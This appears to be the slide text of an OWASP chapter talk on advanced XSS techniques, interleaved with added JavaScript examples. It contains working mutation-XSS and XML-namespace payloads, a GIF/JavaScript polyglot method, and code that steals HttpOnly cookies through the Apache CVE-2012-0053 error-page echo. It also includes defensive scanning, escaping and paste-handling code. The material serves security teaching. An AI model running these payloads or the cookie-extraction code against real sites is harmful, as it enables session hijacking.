3. • WE are Penetration Testing
• WE are Security Professionals
• WE are OWASP Lviv Chapter
• WE are Legio… oops
blog: http://owasp-lviv.blogspot.com
skype: y.bilyk
TEAM
4. AGENDA
- Power of XSS
- Read HttpOnly Cookies
- XSS via XML and GIF
- Clipboard XSS
- WAF XSS Bypass
5. Power of JavaScript
Modern WEB (Angular, jQuery)
Mobile APPS (PhoneGap)
Browser Performance (V8)
Servers use it too (Node.js)
11. • Two ways to modify the DOM:
–Direct DOM manipulation (createElement, appendChild, textContent)
–Assigning a string to innerHTML (the browser parses it as HTML)
innerHTML
12. <script type="text/javascript">
// "new" is a reserved word and cannot be used as a variable name
var newText = "New <b>second</b> text";
function Change() {
  // the assigned string is parsed as HTML, so the <b> becomes an element
  document.getElementById("myPar").innerHTML = newText;
}
</script>
<p id="myPar">First text</p>
<a href="javascript:Change()">
Change text above!
</a>
Example of innerHTML
13. Mutation XSS (Basics)
Web browsers tolerate
wrong HTML syntax
and repair it while parsing
This can cause very
interesting behaviour
In some cases a “safe” payload
(one that passed a sanitizer)
is transformed by the browser's
parse-and-serialize step into
an XSS injection
14. Example of HTML mutation
Original data:
<s class="">hello <b>goodbye</b>
Mutated data by browser:
<S>hello <B>goodbye</B></S>
15. Example of HTML mutation (JS)
Original data:
<img src="test.jpg" alt="``onload=xss()"/>
Mutated data by browser:
<IMG alt=``onload=xss() src="test.jpg">
16. Mutation XSS (Some Examples)
Original data:
<p style="font-family:'223bx:expression(alert(1))/*'">
Mutated data by browser:
<P style="FONT-FAMILY: ; x: expression(alert(1))"></P>
17. Mutation XSS (Some Examples)
Original data:
<article xmlns="x:img src=x onerror=alert(1)">
Mutated data by browser:
<img src=x onerror=alert(1) :article
xmlns="x:img src=x onerror=alert(1)">
</img src=x onerror=alert(1) :article>
21. HttpOnly XSS
Apache before 2.2.22 (CVE-2012-0053)
mishandles oversized request headers:
the generated 400 error page echoes
the offending header, i.e. ALL cookies
from the request, HttpOnly ones included
From XSS we can plant cookies large enough
to trigger that error, fetch the page
and read the cookies out of the response HTML
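An added example, not from the slides, of the two halves of that read: the browser-side part that plants oversized cookies and fetches the error page, and the parsing part that pulls cookies out of it. It assumes a target still running Apache 2.2.x before 2.2.22 (CVE-2012-0053) that echoes the offending header in its 400 page; the error page embedded below is a constructed sample, not a capture, and the function names are this example's own.

```javascript
// Added example (not from the slides): reading HttpOnly cookies through the
// Apache 400 page described above. Target assumed vulnerable (CVE-2012-0053).

const FIELD_LIMIT = 8190;   // Apache's default LimitRequestFieldSize (bytes)
const COOKIE_CHUNK = 4000;  // per-cookie size browsers still accept

// Browser half: plant enough non-HttpOnly cookies that the next request's
// Cookie header exceeds FIELD_LIMIT, so the server answers 400 and echoes it.
function plantOversizedCookies(prefix, doc = globalThis.document) {
  if (!doc) throw new Error('plantOversizedCookies() needs a browser DOM');
  const count = Math.ceil(FIELD_LIMIT / COOKIE_CHUNK) + 1;
  for (let i = 0; i < count; i++) {
    doc.cookie = `${prefix}${i}=${'x'.repeat(COOKIE_CHUNK)}; path=/`;
  }
  return count;
}

// Fetch the page with cookies attached; a 400 still yields a body.
async function fetchErrorPage(url) {
  const res = await fetch(url, { credentials: 'include' });
  return res.text();
}

// Parsing half: recover every cookie from the echoed Cookie header,
// dropping the padding cookies we planted ourselves. Returns null when no
// header was echoed, which is what a patched server gives you.
function extractCookiesFromErrorPage(html, paddingPrefix) {
  const line = html.match(/^Cookie:\s*(.+)$/m);
  if (!line) return null;
  const jar = new Map();
  for (const part of line[1].split(/;\s*/)) {
    const eq = part.indexOf('=');
    if (eq === -1) continue;
    const name = part.slice(0, eq).trim();
    if (paddingPrefix && name.startsWith(paddingPrefix)) continue;
    jar.set(name, part.slice(eq + 1));
  }
  return jar;
}

// Constructed sample of the vulnerable 400 page (not a real capture).
const SAMPLE_400_PAGE = [
  '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">',
  '<html><head><title>400 Bad Request</title></head><body>',
  '<h1>Bad Request</h1>',
  '<p>Your browser sent a request that this server could not understand.<br />',
  'Size of a request header field exceeds server limit.<br />',
  '<pre>',
  `Cookie: PHPSESSID=9a1f4c2e; auth=secret-token; pad0=${'x'.repeat(20)}; pad1=${'x'.repeat(20)}`,
  '</pre>',
  '</p></body></html>',
].join('\n');

// End-to-end, in the victim's browser (assumed XSS context):
//   plantOversizedCookies('pad');
//   fetchErrorPage(location.origin + '/').then(html =>
//     console.log(extractCookiesFromErrorPage(html, 'pad')));
```

The padding is split into several cookies because browsers cap a single cookie at roughly 4 KB, while the header limit is 8 KB; several cookies together cross it. A server that returns a 400 with no `Cookie:` line is patched, and the function reports that as `null` rather than an empty jar.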
25. • JS can be run only from HTML?
–NO
• Can XML contain valid JS?
–YES
So just run JS from XML
XSS in XML?
26. • We can insert HTML tags as CDATA
–But in the browser view this is JUST text
• Or we can insert a valid XML element and
declare the (X)HTML namespace for the data
inside that element
(X)HTML in XML
27. XML Namespace (Basics)
• XML Namespaces provide a method to avoid element
name conflicts (for ex. when joining 2 XML documents)
<table>
  <tr>
    <td>Apples</td>
    <td>Bananas</td>
  </tr>
</table>
<table>
  <name>Coffee</name>
  <width>80</width>
  <length>120</length>
</table>
28. XML Namespace (Conflicts)
• Name conflicts in XML can easily be avoided using a
name prefix (h: and f:); each prefix must be bound to a
namespace URI with an xmlns:prefix declaration
<h:table xmlns:h="http://www.w3.org/1999/xhtml">
  <h:tr>
    <h:td>Apples</h:td>
    <h:td>Bananas</h:td>
  </h:tr>
</h:table>
<!-- urn:example:* is reserved for documentation; any URI you own works -->
<f:table xmlns:f="urn:example:furniture">
  <f:name>Coffee</f:name>
  <f:width>80</f:width>
  <f:length>120</f:length>
</f:table>
29. XSS in XML (Payload)
<x:script xmlns:x="http://www.w3.org/1999/xhtml">
  alert('XSS');
</x:script>
31. How it Works?
The browser's first decision is based
on the Content-Type of the document
(an XML type, not text/html)
XML allows us to declare a namespace
(for ex. (X)HTML) on any element
BINGO! The browser renders that part
of the XML as (X)HTML (just like
inline SVG inside an XML document)
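The following is an added example, not code from the slides: a small namespace-aware scan that finds elements a browser would render as (X)HTML or SVG inside an XML document, which is exactly the condition the `<x:script xmlns:x=...>` payload above relies on, beside the escaping that keeps user text from declaring a namespace at all. It assumes well-formed XML input; the feed it builds is constructed for the example and the helper names are this example's own.

```javascript
// Added example (not from the slides): detect namespace-smuggled (X)HTML/SVG
// in XML, and the escaping that prevents it. Assumes well-formed XML.

const RENDERED_NAMESPACES = new Map([
  ['http://www.w3.org/1999/xhtml', 'XHTML'],
  ['http://www.w3.org/2000/svg', 'SVG'],
]);

// End tags, and start tags with quoted attributes (self-closing or not).
const TAG_RE = /<\/([\w.:-]+)\s*>|<([\w.:-]+)((?:\s+[\w.:-]+\s*=\s*(?:"[^"]*"|'[^']*'))*)\s*(\/?)>/g;
const ATTR_RE = /([\w.:-]+)\s*=\s*(?:"([^"]*)"|'([^']*)')/g;

function findBrowserRenderedElements(xml) {
  // CDATA sections and comments are plain text to the browser: drop them.
  const body = xml.replace(/<!\[CDATA\[[\s\S]*?\]\]>/g, '').replace(/<!--[\s\S]*?-->/g, '');
  const outer = Object.create(null);   // prototype chain doubles as ns scope
  outer[''] = '';                      // no default namespace at the top
  const scopes = [outer];
  const hits = [];
  for (const m of body.matchAll(TAG_RE)) {
    const [, endName, name, attrText, selfClosing] = m;
    if (endName !== undefined) {       // end tag: leave that element's scope
      if (scopes.length > 1) scopes.pop();
      continue;
    }
    const scope = Object.create(scopes[scopes.length - 1]);
    for (const a of attrText.matchAll(ATTR_RE)) {
      const value = a[2] !== undefined ? a[2] : a[3];
      if (a[1] === 'xmlns') scope[''] = value;                          // default ns
      else if (a[1].startsWith('xmlns:')) scope[a[1].slice(6)] = value; // prefixed ns
    }
    const colon = name.indexOf(':');
    const prefix = colon === -1 ? '' : name.slice(0, colon);
    const local = colon === -1 ? name : name.slice(colon + 1);
    const ns = scope[prefix] || '';
    const renderedAs = RENDERED_NAMESPACES.get(ns);
    if (renderedAs) hits.push({ element: local, namespace: ns, renderedAs });
    if (!selfClosing) scopes.push(scope);
  }
  return hits;
}

// Escape user text as XML character data: the five characters that can
// change the markup. Escaped text cannot open a tag, so it cannot declare
// a namespace either.
function xmlEscape(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&apos;' };
  return String(text).replace(/[&<>"']/g, c => map[c]);
}

// A feed embedding a user-supplied title, raw or escaped (constructed).
function renderFeed(userTitle, escape) {
  const title = escape ? xmlEscape(userTitle) : userTitle;
  return `<?xml version="1.0"?>\n<rss version="2.0"><channel><item><title>${title}</title></item></channel></rss>`;
}

// The payload from the slide above.
const XML_XSS_PAYLOAD = `<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert('XSS');</x:script>`;
```

The scan resolves inherited default namespaces too, so an Atom `<content type="xhtml">` block whose `<div xmlns="http://www.w3.org/1999/xhtml">` contains an `<img onerror>` is reported at both the `div` and the `img`, which is the realistic shape of this bug in feed generators.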
37. How it Works?
A JavaScript parser will not accept
raw binary image bytes as code
We need to modify some
non-printable bytes in the image
header so the binary data is wrapped
in valid JS syntax (e.g. a comment),
then append our code after the image data
Inject JavaScript code into image
39. Clipboard (Basics)
Clipboard operations are not
simple memory copy operations
What gets pasted depends on
the destination (Notepad takes
only the plain-text flavour)
What gets stored depends on
the source (MS Word also stores
formatted flavours such as HTML)
40. Clipboard XSS (How?)
Edit a font style in a document
(DOC, ODT, PDF, etc.) so that
it carries the payload
Type/Create some text with that
font style in the document
Copy this text and paste it into
a rich-text area on the victim site:
the formatting travels in the
clipboard's HTML flavour
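An added example, not from the slides, of the receiving end of that procedure: a paste handler for a rich-text field. The vulnerable variant feeds the clipboard's `text/html` flavour straight into `innerHTML`, which is where a style attribute crafted in a word processor lands; the hardened variant suppresses the default rich insertion and only ever takes `text/plain`. The `DataTransfer` stand-in is constructed for the example and the helper names are this example's own.

```javascript
// Added example (not from the slides): vulnerable vs. hardened paste
// handling. The DataTransfer stand-in below is constructed, not a capture.

// Decide what to insert from a paste: always the plain-text flavour, while
// reporting whether a rich flavour was offered so the caller can log it.
function pickPasteContent(dataTransfer) {
  const types = Array.from(dataTransfer.types || []);
  return {
    text: dataTransfer.getData('text/plain'),
    richOffered: types.includes('text/html'),
  };
}

// Vulnerable handler: whatever HTML the source application put on the
// clipboard becomes markup in the page, style attributes included.
function unsafePasteHandler(editor, event) {
  editor.innerHTML += event.clipboardData.getData('text/html');
}

// Hardened handler: cancel the browser's default rich insertion and insert
// the plain-text flavour as a text node at the caret (or at the end).
function safePasteHandler(editor, event, doc = globalThis.document) {
  event.preventDefault();
  const { text } = pickPasteContent(event.clipboardData);
  const sel = doc.getSelection();
  if (sel && sel.rangeCount) {
    const range = sel.getRangeAt(0);
    range.deleteContents();
    range.insertNode(doc.createTextNode(text));
  } else {
    editor.appendChild(doc.createTextNode(text));
  }
}

// Constructed stand-in for the DataTransfer a word processor provides: the
// HTML flavour carries the document's font-family styling verbatim, which is
// the channel the slides describe.
function fakeWordClipboard(fontName, visibleText) {
  const flavours = {
    'text/plain': visibleText,
    'text/html': `<span style="font-family:'${fontName}'">${visibleText}</span>`,
  };
  return { types: Object.keys(flavours), getData: t => flavours[t] ?? '' };
}

// Wiring in a real page (assumed element id):
//   const editor = document.getElementById('editor');
//   editor.addEventListener('paste', e => safePasteHandler(editor, e));
```

If the field genuinely needs formatting preserved, the HTML flavour has to go through a real sanitizer and then the round-trip probe from the mutation XSS section, never straight into `innerHTML`.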
An HTML element’s innerHTML property deals with creating HTML content from arbitrarily formatted strings on write access on the one hand, and with serializing HTML DOM nodes into strings on read access on the other